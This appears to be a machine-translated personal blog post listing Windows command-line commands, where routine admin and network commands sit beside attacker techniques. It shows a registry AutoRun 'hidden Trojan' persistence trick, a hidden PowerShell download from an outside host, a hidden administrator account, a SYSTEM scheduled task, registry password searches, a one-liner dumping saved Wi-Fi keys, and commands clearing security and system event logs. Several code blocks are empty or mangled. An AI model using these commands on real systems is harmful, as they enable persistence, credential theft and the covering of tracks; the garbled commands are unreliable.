Windows common commands

Besides hard work, there is no other way.

Share some of the commonly used windows commands, this article will continue to update, all the notes backed up. Much of this article comes from Internet collation and a small part is summarized by personal experience.

CMD Common Commands

Hidden Trojan:

1
CreateObject("WScript.Shell").RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun", "calc.exe","REG_SZ"

After adding this value to the registry, when running cmd, run your calculator first, and the principle of the cmd /k parameter on the command line.

List the IE proxy settings:

1
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Download remote files:

1
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://www.xxx.com/lcx.1','d:\\3.txt')

1
bitsadmin /rawreturn /transfer getfile http://127.0.0.1:8080/test.zip F:\123.zip

Add a hidden account:

1
2
Net user test$ test /add Add a hidden account whose test user password is test
Net localgroup administrators test$ /add Add test to the system user group

List the updated patches:

1
2
wmic qfe list full /format:htable > hotfixes.htm
wmic qfe get description,installedOn

Recursively look up the login.html file in the d root directory:

1
cd / d d: && dir login.html / a-d / b / s

Enter a directory of a drive letter:

1
d: & cd d:/Clover

Reopen a cmd run:

1
cmd /c whoami

Add a scheduled task:

1
2
3
schtasks.exe /Create /RU "SYSTEM" /SC MINUTE /MO
45 /TN FIREWALL /TR "c:/1.ex e" /ED 2016/12/12
You can change the system inside the RU to your own account name, so you can perform the add plan task.

Process related:

1
2
3
Tasklist view process
Taskkill /im process name
Taskkill /pid[process code] -t (end the process) -f (force the process and all child processes)

Check the vulnerability patches that are not hit on the windows system:

1
2
3
4
```
Get the key value of the password stored in the registry:
```bash
REG query HKCU /v "pwd" /s #pwd can be replaced with password \ HKCU can be replaced with HKCR

Identify the program that starts up:

1
wmic startup list full

Identify the IP and Mac in the NIC:

1
wmic nicconfig get ip address,mac address

View shared services:

1
2
wmic share get name,path
net share

View the location of the logs in the system:

1
wmic nteventlog get path,filename,writeable

Delete log:

1
2
3
wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"

Running service:

1
2
sc query type= service
net start

Installed software and version:

1
wmic product get name,version

View the details of a process:

1
wmic process where name="chrome.exe" list full

Display the wireless password that has been connected to the system: (run as administrator)

1
netsh wlan show profiles

One-click acquisition:

1
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

Check if it is a virtual machine:

1
wmic bios list full | find /i "vmware"

Whether to support powershell:

1
2
3
4
```
Computer product number and model information:
```bash
wmic baseboard get Product,SerialNumber

CMD LAN command

Arp -a lists all active IP addresses in this network segment
Arp -a plus the other party’s IP is to check the other party’s MAC address
Arp -s (ip + mac) binds mac and ip address
Arp -d (ip + mac) unbind mac and ip address

Net view ——> Query the list of machines in the same domain
Net view /domain ——> query domain list
Net view /domain:domainname —–> View the list of computers in the workgroup domain

Ipconfig /all ——> query local IP segment, domain, etc.
ipconfig /release
Ipconfig /renew regain the Ip address

Telnet ip port number: try to open the link remote host port nbtstat -a add the other party IP to check the host name of the other party
Tracert hostname Get the IP address

netstat -a -n
netstat -an | find “3389”
Netstat -a to see which ports are open
Netstat -nView the network connection status of the port
Netstat -v to see what’s going on
Netstat -p tcp/ip to view the usage of a protocol
Netstat -s View all protocol usage in use

Nbtstat -n get NetBIOS
Nslookup domain name Query the ip corresponding to the domain name

DO Common Shortcuts

Mspaint drawing tool
Calc computer
Notepad notepad
Taskmgr task manager
Osk open screen keyboard
Gpedit.msc Group Policy
Services.msc local service
Compmgmt.msc computer management
Devmgmt.msc device manager
Winver View system version
Magnify magnifier utility
Eventvwr event viewer
Regedit opens the registry
Resmon resource monitor
WMIC BIOS get releasedate View computer production date
Mstsc -f remote connection (full screen)

  • This article will continue to collect updates, welcome to leave a message! *

本文标题:Windows common commands

文章作者:nmask

发布时间:2017年03月08日 - 20:03

最后更新:2019年08月16日 - 15:08

原始链接:https://thief.one/2017/03/08/Windows common commands/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: